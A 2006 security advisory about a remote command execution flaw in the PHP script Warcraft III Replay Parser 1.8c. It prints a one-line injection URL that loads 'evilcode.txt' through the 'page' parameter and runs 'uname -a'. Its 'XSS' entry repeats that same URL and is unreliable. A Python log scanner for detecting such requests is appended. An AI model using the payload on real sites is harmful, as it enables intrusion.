Computer Security
[EN] securityvulns.ru
From: botan_(at)_linuxmail.org <botan_(at)_linuxmail.org>
Date: 02.04.2006
Subject: Warcraft III Replay Parser Script Remote Command Execution Vulnerability And Cross-Site Scripting Attacking

Website : http://toya.net.pl/~julas/w3g/
Version : 1.8c

Description :

Warcraft III Replay Parser for PHP? What is that? Maybe you know or maybe not that Warcraft III replay files (*.w3g) have much information inside. Almost everything can be pulled out of them: players' accounts, races, colours, heroes and units made by each player, chat log and many more. If you are a webmaster of a Warcraft III replay site or clan page you know how boring adding new replays can be without automation. This PHP script helps you provide as much information about replays on your site as possible without all the hard work. *

1. Remote Command Execution

Our path is the path of the Agits!

http://www.site.com/[path]/index.php?page=evilcode.txt?&cmd=uname -a

2. XSS Attack

http://www.site.com/[path]/index.php?page=evilcode.txt?&cmd=uname -a

Solution : upgrade to a newer version :)

Contact : irc.gigachat.net #kurdhack & www.PatrioticHackers.com

The 14 are immortal.
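
A log check for the request pattern shown in the advisory, added here as an example; it is not part of the original advisory or the project's code. It assumes Apache-style access logs, an install path of `/w3g/`, and that legitimate `page` values are short alphanumeric names; the sample log lines are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Assumption: legitimate `page` values are short local names such as "replays".
SAFE_PAGE = re.compile(r"^[A-Za-z0-9_-]{1,32}$")
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

# Constructed sample lines (combined log format); /w3g/ is an assumed path.
SAMPLE_LOG = [
    '192.0.2.10 - - [02/Apr/2006:10:00:01 +0000] "GET /w3g/index.php?page=replays HTTP/1.1" 200 5120',
    '198.51.100.7 - - [02/Apr/2006:10:00:09 +0000] "GET /w3g/index.php?page=evilcode.txt?&cmd=uname%20-a HTTP/1.1" 200 312',
    '192.0.2.10 - - [02/Apr/2006:10:00:12 +0000] "GET /w3g/style.css HTTP/1.1" 200 900',
]


def suspicious_page_requests(log_lines, script="index.php"):
    """Return (client, page_value, reasons) for requests whose `page`
    parameter is not a plain page name."""
    findings = []
    for line in log_lines:
        match = REQUEST.search(line)
        if not match:
            continue
        url = urlsplit(match.group(1))
        if not url.path.endswith("/" + script):
            continue
        params = parse_qs(url.query, keep_blank_values=True)
        for value in params.get("page", []):
            if SAFE_PAGE.match(value):
                continue
            reasons = []
            if "?" in value:
                reasons.append("embedded '?' in page value")
            if "://" in value:
                reasons.append("URL in page value")
            if ".." in value or value.startswith("/"):
                reasons.append("path outside the page directory")
            if not reasons:
                reasons.append("not a plain page name")
            if "cmd" in params:
                reasons.append("cmd parameter present")
            findings.append((line.split()[0], value, reasons))
    return findings


if __name__ == "__main__":
    for client, value, reasons in suspicious_page_requests(SAMPLE_LOG):
        print(client, repr(value), "; ".join(reasons))
```
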
